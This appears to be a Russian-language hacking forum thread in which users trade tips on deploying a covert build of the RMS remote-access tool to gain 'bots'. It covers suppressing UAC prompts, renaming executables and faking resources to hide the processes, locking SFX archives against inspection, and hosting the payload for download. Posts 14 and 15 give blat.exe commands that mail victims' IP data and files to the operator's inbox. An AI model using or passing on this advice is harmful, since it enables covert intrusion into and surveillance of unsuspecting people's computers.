Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

1. zloy-alexman
    zloy-alexman Новичок
    Симпатии:
    1
    Мен! я разобрался что и как делается, спасибо Mr.Burns за новый winmm.dll !!

всё отлично работает с последней версией с офф сайта скачанной!!!
    За 15 минут 200 новых ботов)

10 авг 2013
  2. Rmist
    Rmist Новичок
    Симпатии:
    1
    Только у меня в 5.5.2 нет записи видео? Как чинить? В старом вьювере 5.2 все работает.

Последнее редактирование: 11 авг 2013
    11 авг 2013
  3. Gamadril
    Gamadril Новичок
    Симпатии:
    0
    Народ кто подскажет, можно ли сделать в конфиге архива sfx (делаем через 7-zip) требование запуска exe архива с правами администратора? (палево в win 7)

крах, если можешь выложи пожалуйста config.txt для sfx архива 7-Zip. (файл setup.exe)

12 авг 2013
  4. Kinaka
    Kinaka Новичок
    Симпатии:
    0
    Какой пароль к архиву??? в начале было написано -
    НО НЕ ПОДХОДИТ че делать???

12 авг 2013
  5. subor
    subor Новичок
    Симпатии:
    1
    Работает, но коряво. Видимо поэтому разработчик начиная с версии 5.5 убрал фичу
    В ресурсах ексешника requestedExecutionLevel level поставить "requireAdministrator" , но зачем?

12 авг 2013
  6. Rmist
    Rmist Новичок
    Симпатии:
    1
    123123 не работает?

12 авг 2013
  7. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Странно, но я задавал именно такой пароль:123123

12 авг 2013
  8. Gamadril
    Gamadril Новичок
    Симпатии:
    0
    Спасибо за наводку. Нужно что бы в случае если юзер не через ПКМ сделал (запустить от имени администратора на win 7), а просто кликнул что бы ему не вылезали сообщения от UAC при записях в реест, старте rutserv.exe и т.д. По твоей наводке нашёл настройку exe файла (ставить галочку запуск от админа). Но эта настройка слетает если файл копируется (или закачивается). А как жёстко это прописать? Смотрел ресы файла через Resource Hacker но не нашёл где прописать. Подскажешь?

Отрубить сам UAC не вариант так как всё равно потребуется тогда перезагрузка и ещё один файл чтоб прописать это в реестре. (если ничё не путаю)

13 авг 2013
  9. deity
    deity Новичок
    Симпатии:
    7
    при переименовывании и переклеивании ресурсов (иконки, описания) экзешников рмса есть ли риск неработоспособности хоста? хочу избавиться от стандартных названий процессов рмса, убрать иконку, приклеить ресурс описания какого-нибудь влан сервиса

13 авг 2013
  10. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    При переименовании экзешников рмса id не шлёт! А так работает)

14 авг 2013
  11. Gamadril
    Gamadril Новичок
    Симпатии:
    0
    subor, Нашёл этот параметр в ресах exe'шника, спасибо помог:)

Добавлено через 1 час 45 минут
    Кто нить подскажет может есть стандартная функция блокировки созданного sfx архива через 7z, что бы нельзя было просмотреть его содержимое? (альтернативный упаковщик SFX Creator 2.7 знаю)

Последнее редактирование: 14 авг 2013
    14 авг 2013
  12. franky
    franky Новичок
    Симпатии:
    0
    Ссылка на архив с первого поста, без пароля !!! Автор, в скайпе, говорит что не помнит пасс на архив, видать за бабло отдаёт...
    http://narod.ru/disk/19954237001/utilities_v4.1.rar.html

Последнее редактирование: 16 авг 2013
    16 авг 2013
  13. Rmist
    Rmist Новичок
    Симпатии:
    1
    есть отличная прога на такой случай - Password Recovery Kit Enterprise. Подберет пароль из 6 цифро-знаков за 10-15 минут (от машинки зависит). Если не найдете - пишите на гугл выложу.

16 авг 2013
  14. Sergey0001
    Sergey0001 Новичок
    Симпатии:
    0
    Доброго времени суток, Народ! Извиняюсь, конечно, за такой вопрос, но думаю Вы простите меня и поможете в этом. У меня такая проблема:я не могу разобраться в этом:blat.exe -install -server smtp.yandex.ru -port 587 -f ###LOGIN###@yandex.ru -u ###LOGIN### -pw ###PASSWORD###
    blat.exe -to ###LOGIN###@yandex.ru -subject "PERFECTLY! RMS Service (c) by Alex Hitch" -attachi "reallip.txt" -body "Real Ip [pass]" -attach %temp%
    Помогите разобраться. Я не могу понять, куда писать свой логин, а куда пароль. Выделите этот код и приведите пример, пожалуйста, если кто-то может. Буду признателен.

17 авг 2013
  15. Afftarius
    Afftarius Новичок
    Симпатии:
    0
    пусть ты будешь vasya@yandex.ru с паролем 12345

blat.exe -install -server smtp.yandex.ru -port 25 -f vasya@yandex.ru -u vasya -pw 12345
    blat.exe -to vasya@yandex.ru -subject "PERFECTLY! RMS Service (c) by Alex Hitch" -attachi "realip.txt" -body "Real Ip [pass]" -attach %temp%\*.mpf

18 авг 2013
  16. andy_panda
    andy_panda Новичок
    Симпатии:
    0
    Учи какой-нибудь язык программирования, напиши свой скрытый установочник RMS. Вместо sfx архива используй ресурсы. И будет проблемно посмотреть что там внутри твоего exe.

18 авг 2013
  17. halesiy
    halesiy Новичок
    Симпатии:
    0
    sawyer1992,
    Доброго времени,я слегка не в теме,такой вопрос - на яндекс народ закрыли конструктор сайтов как теперь быть с мануалом по сборке rms? что подправить или жопа?

Добавлено через 3 минуты
    4ekkk,
    Доброго времени,я слегка не в теме,такой вопрос - на яндекс народ закрыли конструктор сайтов как теперь быть с мануалом по сборке rms?

Звиняй если отвлек

Последнее редактирование: 19 авг 2013
    19 авг 2013
  18. airstrike
    airstrike Новичок
    Симпатии:
    1
    halesiy,
    Где взаимосвязь между конструктором сайтов на народе и мануалом по сборке RMS?

19 авг 2013
  19. halesiy
    halesiy Новичок
    Симпатии:
    0
    Звиняй за глупость я так понял "Зайдите на свой аккаунт на Яндексе
    2. Переходим по ссылке http://narоd.yаndеx.ru/
    3. Нажимаем «Создать сайт» (сайт нам не нужен, только файл-менеджер)
    4. Когда наш сайт создан заходим в файл-менеджер, ****.narod2.yandex.ru/filemanager/
    5. Выбираем «Загрузить файл», загружем нашу RMS сборку
    6. После того как загрузится файл, там должна быть такая серенькая кнопочка «ссылка», нажимаем, копируем."

19 авг 2013
  20. airstrike
    airstrike Новичок
    Симпатии:
    1
    С трудом можно догадаться что ты хочешь сделать... Downloader? Тогда заливай свой exe на dropbox

19 авг 2013
Загрузка...